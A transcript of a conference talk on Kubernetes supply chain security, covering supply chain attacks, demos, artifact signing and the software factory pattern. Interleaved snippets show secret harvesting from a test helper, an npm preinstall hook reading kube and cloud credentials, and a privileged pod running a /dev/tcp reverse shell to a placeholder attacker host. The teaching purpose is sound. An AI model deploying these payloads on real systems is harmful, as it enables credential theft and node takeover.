Hello, good morning and welcome. Very pleased to see people in person as opposed to on the other side of some amorphous internet screen. We're gonna talk about the software factory today, some supply chain fun, and yeah, thank you for coming to my talk in advance. So: Kubernetes supply chain security, the software factory, AKA who's afraid of the big bad supply chain. Hi, I'm Andy, I'm from ControlPlane. We are a cloud native security consultancy. We have audit, pentest, and engineering capabilities, and I have a wonderful team. I've done lots of development, that's kind of where the background comes from. Security is a deep passion, and operations of course is necessary as the strong baseline on which to build solid security engineering practices. I am very lucky to have had the opportunity to write SANS SEC584, attacking and defending containers and Kubernetes. With my preeminent co-author, Mr. Michael Hausenblas, I have written the book Hacking Kubernetes. It has gone into print today. It will be available as an ebook by the end of the week. It's already available on Early Access, and yeah, huge thanks to Michael. It is a step-by-step guide to attacking, defending, and ultimately securely deploying Kubernetes for regulated environments and everywhere else. And today, we are going to talk about the supply chain. What is it? Why is it a problem? Then we will look concretely at how to attack a couple of different supply chains, specifically at install time for a package, and secondarily, if I can get malicious code running in your Kubernetes clusters, what can I do? We will look at signing. Signing is the feted mechanism by which to fix all these things. Signing is easy, verification is hard. And finally, we'll draw everything together with the software factory pattern. The panacea? Potentially not, but certainly a useful advancement in our journey. There has been so much chat about the supply chain already at KubeCon.
There was a Supply Chain Security Con on Monday. SIG Security, or TAG Security as they are now, ran the security day yesterday. And there's so much going on in the ecosystem right now. We're really moving forward after a difficult, I guess, kind of a few years of stasis, as we build out new package managers and so on since OCI came into existence. So there is a lot here. I will be referencing other talks throughout. So what is a supply chain? It is anything that we depend upon. In a military context, this could be the individual nuts and bolts that go into your aircraft carriers. Pharmaceutically, it is how we get drugs from a factory into a person without them dying from some sort of contamination on the way; same for food. Manufacturing is your kind of just-in-time, Toyota-style manufacturing. And software: software is built of other pieces of software, and each of them has an independent supply chain. As a consumer, it is beyond our direct control. We have to have that trust in the previous steps. And finally, it is reliant on trust, which is never a solid thing on which to base security, and so something we need to look at in depth. So for a software supply chain, any code that ends up running in production is part of the supply chain. What could possibly go wrong? We ask ourselves: potentially a lot. We rely upon our producers to have done things sensibly, and we can't necessarily always validate those things that they have done. So as we move into this post-bare-metal, sort of cloud-native renaissance future, everything is defined as software. That extends from, of course, the applications that have always been software, but the infrastructure is now programmable, our security is now defined as code, and the same with policy as code. It's reproducible, it's statically analyzable, and this is really useful for us because it ensures reproducibility. It gives us the advantage of being able to test things in all sorts of different dimensions and domains.
And it means that, with consistency, we can apply the same style and type of controls to each of those things. Static analysis and linting is a fine example. In the Kubernetes world, everything is declarative, and therefore we can define what a good baseline state looks like and test it. So from a software factory perspective, we're potentially building anything and everything that is software. What could that be? Well, various different examples here: artifacts, the actual deployments into clouds that we're doing onto some of those platforms, all the way through infrastructure, and especially our security and NFRs. Importantly, if we are going to use full build automation for all of these things, which of course we should do, segregation of the build servers becomes important, because the privilege afforded to a security-based build server, or perhaps something that's going and rotating certificates in networking appliances, et cetera, means that it should probably be so isolated, segregated, and on its own managed network that it's not visible to a lot of the rest of the organization. So, supply chain: everything is software, we compose software of other pieces of software, and we rely upon our producers for safety. This is trust, and it is not really verifiable in the classic sense. What does that mean? Well, if we have a supply chain here with Bob in the middle, Bob, as you see, delivers Alice's code to Charlie. If Bob drops malware in and implants some malicious software, which does not perform the highest and best use of the infrastructure that it's on, perhaps, it's very difficult to detect. And this process of malicious supply chain insertion is something that we've seen happen more and more, and it increasingly becomes the new attack surface. Supply chains are very long and difficult to secure, because not all of the events occurring in the supply chain are even visible to us.
And when we say the new software security frontier, we're actually talking back to Reflections on Trusting Trust, the seminal paper on malicious compilers that build malware into their outputs. So there we are. We must essentially trust everything in a supply chain, and this is where things get really difficult, because if we don't trust each and every step, each one is an insertion point at which stage potentially some malicious code is inserted into a compiled artifact. Very difficult to detect, because you have to perhaps reverse engineer or decompile the thing in order to understand if there's a malicious side effect from the implant, as we'll call it. There we go: Reflections on Trusting Trust, Mr. Thompson himself. Okay, so let's look at how to attack a supply chain. The book features an archetypal eight-bit adversary. This is Captain Hashjack in his many guises. This malicious adversary wants to run his code in our production systems. It's really that simple. It doesn't matter if that's crypto mining or popping a reverse shell, which we'll look at in a moment, or in fact just adding ourselves, adding our infrastructure, to a command and control network, so we can use that at a later point, perhaps bounce other malicious traffic through it, or use it for something like a watering hole attack, where you surface or host malicious code on somebody else's infrastructure, and so it becomes essentially a wide and recursive game. What has happened recently in the danger zone? We have had the REvil gang attack Colonial Pipeline via a provider. We've seen SolarWinds, which is kind of the canonical example at this point because the impact was so wide. When we have a highly privileged piece of software, like a server monitoring agent or observability and security tooling, those kinds of tools generally need a lot of access to the underlying system. That's because necessarily they're performing a task on behalf of humans.
And instead of having a human go in and kind of check the process table every so often, we have something else do that monitoring for us. That kind of highly privileged software, if attacked, of course then has complete control of the underlying system and can perform sort of behavioral obfuscation and kind of hide what it's actually doing. In the SolarWinds case, that was by using outbound network messages very similar to the underlying product's debug-style traffic, but sent to a maliciously hosted DNS server, and running command and control that way. The network effect of this, because one provider is attacked and that piece of software is installed in 50, 100, 1,000 places, becomes a huge amplification of maliciousness, perhaps. What else have we seen? Codecov, that was attacking a CI build. And the point here, as with SolarWinds, is that CI is highly privileged, and therefore the software factory makes some sense, as I will attempt to convince you. Notably here, the last one as well, XcodeGhost was a concrete implementation of the Reflections on Trusting Trust issue: it was a backdoored version of Xcode, and it would compile artifacts with a command and control botnet client in them. So anybody who compiled an artifact with this and distributed it was then putting their consumers onto a botnet inadvertently. TAG Security, one of my favorite places to hang out, has this useful catalog of supply chain compromises. It groups a lot of the attacks that we've seen in the past years into categories. As we can see, source code is the preeminent attack path here. That means getting malicious code into somebody else's repository. But hot on its heels, developer tooling. We'll look at how this works with a demo in a bit. Publishing infrastructure: at that point, of course, this is our CI/CD systems. This might be, well, in fact, the next group, trust and signing as well.
Getting into the publishing infrastructure and changing the source code just before it's built — that was the SolarWinds-style attack. It becomes very difficult to determine what occurred there, because the compiler takes in trusted inputs on the assumption that the build server is secure. When we consider what a build server does, it's remote code execution as a service. It's running on behalf of developers in order to save them from the job of manually packaging their bits and shuffling them off somewhere else. It's necessarily highly privileged. Therein lies the attraction for an attacker. When we look at trust and signing, often that is also a function of the build server. Those keys will be available, or there'll be a signing endpoint that the build server has permission to push artifacts to and receive signatures in return, like a KMS system. Again, it's the process of being on the build server and in control of its behaviors that opens up these types of attacks. And of course, we can chain them together. Negligence makes an appearance, notably for a PyPI typosquatting attack. Typosquatting is the process of taking something like event-stream with a hyphen in the middle, and copying that package to eventstream without the hyphen. And when developers are happily just manually defining their dependencies on the command line, both of them resolve. And the attacker keeps the malicious typosquatted secondary package up to date, and then at some point, once it's got 100,000 installs a week, decides to add their own piece of malicious code, maybe as a transitive dependency, so it's not visible in the original package — and therein lie the problems. Fortunately, the manifestations that we've seen of this so far are generally looking for crypto wallets. If they start looking for SSH keys and GPG keys and your AWS credentials, then we might see these kinds of things taken a little bit more seriously. So how do we attack? Well, we can get into a developer's machine.
The end user device, if it has specific endpoint protection, may detect some of this — probably not; it looks legitimate that we're using our credentials. Getting into the source repository, well, that makes some sense. It does leave a trail, of course, because we have everything as a Merkle tree in Git, and that means that we can't rewrite that history unless we're force pushing. So once the attack is in there, as long as the repository has suitable, sensible branch protections, we'll be able to detect it at a later stage. The build infrastructure — of course, we've been talking about this. Hosted build infrastructure still suffers the same problems; it's a question of access, and we'll look at how to detect compromises of build infrastructure as we progress. Or we go further up the trusted supply chain: we move backwards from what the developer is doing in their repository and we say, okay, well, you're putting in this dependency, I'll attack that dependency, or that dependency is pulling in yet another dependency — that's where we'll start. Any of these things can run code, and if we consider where we might want to put that code, it doesn't matter. We can put it into the test suite. A test suite, while it may be exercising the underlying code, also has the ability to just dump environment variables, read things from disk, or push things out via DNS. We've also got the potential for command and control even if we're restricting what we allow into our organization: places like GitHub and Docker Hub, image registries — we can publish to those as well. So even running air-gapped or offline infrastructure poses some sort of problem without being very strict — and I say air-gapped in the cloud sense: very strict, and doing things like running split-horizon DNS. So really, just keeping this code out of production is the first line of defense.
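The test-suite vector just mentioned is worth sketching concretely. The following is a hedged illustration, not anything shown in the talk: the filename, the fake credential, and the command-and-control host are all invented, and the real exfiltration step is left commented out.

```shell
# Hypothetical sketch of "the test suite as an exfiltration point": a step
# that looks like a harmless test helper needs nothing more than environment
# access to harvest CI secrets. All names here are invented for illustration.
cat > /tmp/ci_test_helper.sh <<'EOF'
#!/bin/sh
# Harvest anything secret-looking from the build environment...
env | grep -iE 'token|secret|key' | base64
# ...then a real implant would ship it out, e.g. over DNS or HTTPS:
# curl -s https://c2.example.invalid/drop --data-binary @-
EOF
chmod +x /tmp/ci_test_helper.sh
# Run it as CI would, with a fake credential in scope:
CI_DEPLOY_TOKEN=hunter2 /tmp/ci_test_helper.sh
```

Nothing in a standard CI runner distinguishes this from a legitimate test step, which is the point being made above.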
Finally, of course, we can actually attack the runtime environment, which is to say, well, everybody is using, for example, Debian or Ubuntu — let's attack one of the common packages in there. Fortunately, that is significantly more difficult, because we have a lot more eyes on that code. Open source has a variance in how many people are taking supply chain security seriously, and fortunately there's been a lot of effort put into things like reproducible builds, and of course there's the fact that there are a lot of trusted maintainers who are known individuals in those domains. So in sort of order of difficulty, it's certainly the most difficult. We have had SLSA released recently, which is a supply chain security framework. It does base a lot of its assumptions on the fact that your build server is not already compromised — if it is, a lot of these things fall down — but this is an example of the various places you can attack a build. Obviously, if we bypass code review, or we don't have four eyes, as in a secondary individual merging code, there's potential for any old junk to be committed. We can compromise source control; of course, again, we're leaving some evidence of what we've done there. Modifying code after source control, that's a bit more interesting — that's our SolarWinds-style attack. Compromise the build platform: again, we're in a very difficult situation when trusted infrastructure is compromised. Bad dependencies. And bypassing CI/CD altogether, so just pushing straight into a package registry — arguably you could do that by getting onto the build server and exploiting those credentials; you generally need a network route to do that, of course. And yeah, bypassing, compromising, and bad packages. Okay, so let's put some meat on these bones. If we have an application dependency that we install from the internet onto our device in the process of building software — a perfectly legitimate use — we can potentially have that run malware.
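The install-time mechanism about to be demonstrated can be sketched as a minimal package manifest. This is a hedged reconstruction, not the talk's actual demo package: the package name and the payload command are invented, and we only inspect the manifest rather than running `npm install`.

```shell
# A sketch of an npm install-time implant: the "preinstall" lifecycle script
# runs arbitrary shell with the installing user's privileges, before any of
# the package's code is inspected. Package name and payload are invented.
mkdir -p /tmp/implant-demo && cd /tmp/implant-demo
cat > package.json <<'EOF'
{
  "name": "eventstream",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "cat ~/.kube/config ~/.aws/credentials 2>/dev/null | head -c 256"
  }
}
EOF
# `npm install` on any project that (transitively) depends on this package
# would execute the preinstall command; here we just show the hook is wired:
grep -o '"preinstall"' package.json
```

The same lifecycle-hook pattern exists in other ecosystems (e.g. setup.py in Python), which is why install-time execution is such a broad attack surface.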
And I'll give you a quick example here. Let me see, game over approaching. So, how are we doing? Let's make that simpler. Right, so what we've got here is an npm package. And as you can see in the package itself, it's an npm malicious implant example, and we have this marvelous preinstall hook. This means that before the package does anything, it runs arbitrary code. Who's looking after that code when it's pushed into npm? It's not us, that's for sure. So hypothetically, we're just pulling a package — especially if we're looking at something that's been typosquatted, we might expect this to be legitimate. And we'll just do an npm install in our local directory. And this is my example script. What can we do? Well, we've got the permissions of the user running the script here. Yes, we could do a denial of wallet attack on someone's laptop — that's probably not very sensible — but these are truncated bits of credentials from my SSH directory and my cloud providers. And this is a very real concern. Operations engineers may have innumerable different Kubernetes clusters listed in their kubeconfig. So this is a very difficult thing to protect against. There's no malware detection, there's no antivirus that will stop an install performing local file system actions. That's the point; that's what it's there to do. So that is the first attempt. What can we actually do here? Well, 2FA really is the defense. There's a reason that we protect passwords and things, that we have YubiKeys and physical auth tokens, because otherwise these things are very easy to exfiltrate. Plain text credentials, yes, of course. Crypto wallets really are the main target of all of these attacks at the moment, so if you have money in them, I'm sure you know how to look after them — and air-gapped development. Okay, let's look at a different demo now, in Kubernetes itself.
So the principle here is that I, as an attacker, have managed to get you to run something in production that contains my code. There are a few ways to do this. It could be an Easter egg-style attack where it requires some form of trigger — maybe that's the time and date, maybe it's an identifier in the cluster itself. And the idea is that I sit on the internet with an open port that's linked through to my machine. I get the malicious image in — and actually there's a wonderful way to do this with an app called dockerscan, which will trojanize applications just by messing with LD_PRELOAD, so you can't even see the thing in the container's filesystem; it's metadata in the OCI image. And so what this does is, when the container starts, it fires a reverse shell. It's called a reverse shell because you're going back to an attacker-controlled endpoint, from inside the infrastructure back out. So it punches through firewalls, of course, because if you have internet access, you're just going to resolve a host and port combination. And then I'm listening on the other end. Let's have a look at how this works. In order to get the reverse shell — this is a prayer to the wifi gods, incidentally — in order to get the reverse shell, we use something called ngrok, which is just free TCP forwarding. So that's opening a tunnel. What we've got here is a local listener, so that's just running Ncat here locally. And that won't do anything until we have done this. So what we're going to do here is just create a pod. That pod is running this reverse shell to the resolved IP of the ngrok tunnel that we've just opened. This is the joy of having bash in your containers, because you've got this virtual /dev/tcp endpoint that we can use for nefarious activities such as this. Then we do a dynamic rewrite: let's enable hostPID, let's make ourselves privileged.
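The pod being constructed in the demo looks something like the following sketch. This is a hedged reconstruction rather than the talk's exact YAML: the pod name, image, and attacker host/port are illustrative, and here we only write the manifest out rather than applying it to a cluster.

```shell
# A sketch of the demo pod: hostPID plus a privileged security context, with
# a bash /dev/tcp reverse shell as the entrypoint. Names and the attacker
# endpoint are invented; `kubectl apply -f` would run this in a real cluster.
cat > /tmp/revshell-pod.yaml <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: backdoored
spec:
  hostPID: true                 # see the host's process table
  containers:
  - name: shell
    image: ubuntu:22.04
    securityContext:
      privileged: true          # unmasked /dev, host devices reachable
    # bash's virtual /dev/tcp device dials out to the attacker's listener:
    command: ["bash", "-c", "bash -i >& /dev/tcp/attacker.example.invalid/4444 0>&1"]
EOF
# The listener on the attacker's side is simply something like: ncat -lvk 4444
grep -c 'true' /tmp/revshell-pod.yaml
```

Blocking exactly this combination — `privileged: true` and `hostPID: true` — is what admission control (Pod Security admission or a policy engine) is for.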
And with those two things, we can either remount the host file system into the container, or we can nsenter the host namespaces. And obviously, in this situation, I am privileged, in that I already have the capacity to — very slowly, potentially — deploy to the cluster. Let's see if that actually does everything. Yes, eventually. Okay, so let's run this. It will spit out the YAML that it runs as well. And you can see, because this is a public IP, people are scanning this range and somebody's just tried to connect to my laptop. Oh, wonderful. And terminated — this command doesn't look good. Okay, so that's halfway there because there's newlines, nice. There we go. So what have we done? We've just dynamically created a reverse shell to the endpoint that we've created here. We have slipped a privileged security context in and enabled hostPID. And there we go, there's the reverse shell. So what does this mean? Well, I'm now inside a container in your infrastructure because you ran a thing that I hid a backdoor in, essentially. And from here, of course, we've got the canonical "what is available?". Well, we know that we're in a privileged container because /dev is unmasked — we can see all the things in here. And because we can use df to see where /etc/hosts is mounted in by the container runtime, that's leaked the name of the underlying disk. And then we can remount that into — whoops-a-daisy. Drat. Okay, I'm just gonna do that again for the sake of actually finishing that demo, because I managed to close the window. So if I just delete that deployment and then rerun the shell catcher — so that's now opening another public IP and port combination — then I'll rerun this, and I expect that also to — there we go. And that then fires this. Okay, so as we were. We can see — let's remount this onto a mount point. And then we can see — so that's the host file system. And from here, we can do whatever we like. We can go and exfiltrate things.
We can pull the authorized keys — well, we can pull any private keys that are sat in the host file system. We can add our own keys into authorized_keys if we want to get in there. We can also persist by this route: fire off another persistent reverse shell and just jump straight in. It's game over for that node. Without node authorization, it's game over for the cluster. And if there are any privileged workload integrations, it might be game over for the cloud account. Okay, so that's what happened: from my machine, I created that public socket, I ran the implant, which then connected back to it, and then I've got essentially a command and control session, a reverse shell, into the victim. The point here is that we do not want, under any circumstances, that to happen. There are ways around this. We've got things like Trivy to scan our images, which should prevent some of these things — of course, we need somebody to detect a malicious image in the first place. Obviously we want security contexts. There's runtime behavioral analysis that we can do, and eBPF, of course, is the buzzword and the thing that will help us to do that. Okay, so let's move on into the last section, the software factory, looking at policy and attestation. As we've said, signing is the easy part; verification is more difficult. Mike and Tim from Citibank did a great demo — on Monday, actually, at Supply Chain Security Con — with a modern implementation of the Reflections on Trusting Trust attack, that is, going into the build server and swapping things out, and looking at how we can use cosign, which is part of the Sigstore suite of tools, to protect against that. Yes, and that demo is — there we go, slowly loading — that demo is available. I think the videos for that will be out in a couple of weeks, and well worth a watch. Okay, so looking at all those problems, how do we fix them? Signing is the way.
We take a public and private key pair, we use some data, and we create a signature that can then be revalidated at a later date with the public key. In terms of build server attestation and security, we can also sign each individual build step. Now, this gets difficult, because we need to know that the inputs and the outputs stay consistent. If we're performing a transpilation or compilation step in the middle, then we're just signing the fact that a build step occurred. This is better than nothing, but still there are constraints on what you can do. in-toto is the de facto tool to do this. It's integrated into Tekton Chains at this point, and there's a lot of work ongoing in there as well. We can also sign container images. So we've got those individual signatures for the build stages; that creates an artifact. That artifact is then "trusted", in inverted commas, and we can then go and sign the thing. So again, we can revalidate that at a later date, and Sigstore and Notary v2 are the emergent forerunners in this space to effectively sign our artifacts. Rekor is a transparency log that operates in the same way as the Let's Encrypt style of certificate transparency log, where all our metadata is put somewhere public so that anybody can revalidate it at a later stage and be sure that it was us doing the thing to the artifact. There are all sorts of different parts of Sigstore. The maintainers have just started a company around this as well. They have a booth here somewhere. They are called Chainguard, and well worth a conversation. And I've got a quote from Mike himself here: software does not compromise itself, it's humans that are the problem. And if companies don't publicly provide transparency into what is inside their compiled artifacts — so, what happened in the build? This is the software bill of materials, about which, again, there is a lot of conversation this week.
I mean, perhaps it's the wrong thing to say, but: if you've got nothing to hide, you've got nothing to fear, or something around that. Ultimately, we want to know if somebody ships us a binary artifact with a compromised package inside, because when there's a zero-day released for a dependency that's packaged and deployed in our systems, we want to upgrade it — we deserve to know, so we can take remedial action. Okay, so underpinning all of these things is a question of identity. SPIFFE, another CNCF project, is ephemeral workload identity. It gives us a signed certificate containing metadata about a process, and with a very short expiration, that can be used as the root of trust for signing. It can be used as an identity — Istio uses this concept for mutual TLS for workload identity — and it's incredibly powerful. All of these projects are kind of being smushed together in this concept of a software factory — and in-toto Golang is, again, another integration — in order to give us this kind of end-to-end signing. And this takes us to the software factory. So what is this? It is building pipelines that build other pipelines, so that our DevOps is strong. That is Bertha, the 1980s children's TV show in the UK. And it means that we have a strong baseline of DevOps skills, if you like, and the ability to stand up new infrastructure very quickly, aggressive automation, and it welcomes signing approaches. So there are lots of different moving parts. It is a large, complex, but not intractable problem, with a lot of different organizations working to deliver a sort of canonical implementation. The Department of Defense is one of those organizations. They have built a reference design. It doesn't come with an implementation — it's a white paper — so ControlPlane and colleagues at Citibank and the TAG Security supply chain working group are looking to build out a concrete implementation based upon these things.
And of course, underpinning everything is this concept of rigorous automation. The reference architecture — I apologize for the slow image loading on these. Okay, so what we're looking at here is a subdivision of different trust domains, and in the bottom corner we've got the source control, and in the bottom green box we see an identity attester. That is a privileged process that looks at metadata about processes running on the same system in order to uniquely identify them, attest to their identity, and then provide that as the root of identity with which to mint a certificate. I'm sure there's a nice image there. Okay, so the trick here — oh, all right, so just to roll back slightly. So, different views on the software factory architecture here. What we're looking at here is a Kubernetes system running Tekton, the distributed build system that's actually underpinning Jenkins X — version two, I think they've moved onto it. There is an assumption here that the cluster is secured: the infrastructure, the SREs, the people with access to it, it's all locked down. Once that assumption is valid, then we see we have Tekton here, which is able to perform these individual task runs, which are our build steps. Tekton Chains ensures that the steps are run, generates that signature, and pushes it out to the signature store and Rekor — so again, that's the public transparency log — and an evidence lake of some description. And then we see we have also got our signing key in order to get that SVID. And at the top we have SPIRE, which is that workload identity, that dynamic attestation which mints certificates for us to use in signing. None of this solves the problem of compromised build infrastructure. So how do we fix malicious SREs, or indeed a supply chain attack against our hosting provider? The trick is to run it twice in different places. This is already done by the in-toto project, which supports this.
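That run-it-twice comparison can be sketched in a few lines. The `build` function here is a stand-in for a real deterministic build step, and the builder paths are invented for illustration:

```shell
# Sketch of double-build detection: two independent builders produce the same
# artifact; diverging digests mean either non-determinism or a compromised
# builder. build() stands in for a real (normalised, deterministic) build.
build() {
  mkdir -p "$1"
  # A real build must first normalise timestamps, locale-dependent ordering,
  # and archive entry order, or the hashes will differ for benign reasons.
  printf 'compiled output' > "$1/artifact.bin"
}
build /tmp/builder-a
build /tmp/builder-b
a=$(sha256sum /tmp/builder-a/artifact.bin | cut -d' ' -f1)
b=$(sha256sum /tmp/builder-b/artifact.bin | cut -d' ' -f1)
if [ "$a" = "$b" ]; then
  echo "digests match: artifact reproducible across builders"
else
  echo "digest mismatch: investigate the builders"
fi
```

With genuinely reproducible builds, a single honest builder among N is enough to surface tampering, which is the property the talk is relying on.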
This is how our operating systems build packages: globally distributed builds. The idea being, if one of those builds is compromised and we have reproducibility for all the artifacts that we build, we compare the hashes, and if the hashes don't line up, something's changed. That might be non-determinism in the build; that might be the introduction of temporal data, or a change of locale, so things are ordered differently on disk, they go into a compressed artifact in a different order, and so it's a different hash. But on the assumption that those things are normalized and we actually have full reproducibility of the artifacts that we build, this is the de facto mechanism by which to detect compromised build infrastructure. Going all the way back to the software factory pattern: the software factory should be able to build itself, it should be able to recover from disaster effectively, and it should be able to build other types of pipeline very effectively as well. Once that level of automation and sort of rigor has been achieved, this becomes a natural extension. Up until that point, there is a lot of work — it's difficult to front-load this kind of effort, and I'm not gonna try and say that it's not — but once we have that solid baseline, the evidence lake becomes a comparative place where we can essentially detect signals of compromise in a way that's very difficult to do otherwise, as we've seen. The Sigstore group — and Dan Lorenc is here as well — have put together an excellent white paper, if you'd like to read more on that. That is the end, that is Captain Hashjack, and thank you very much for your attention.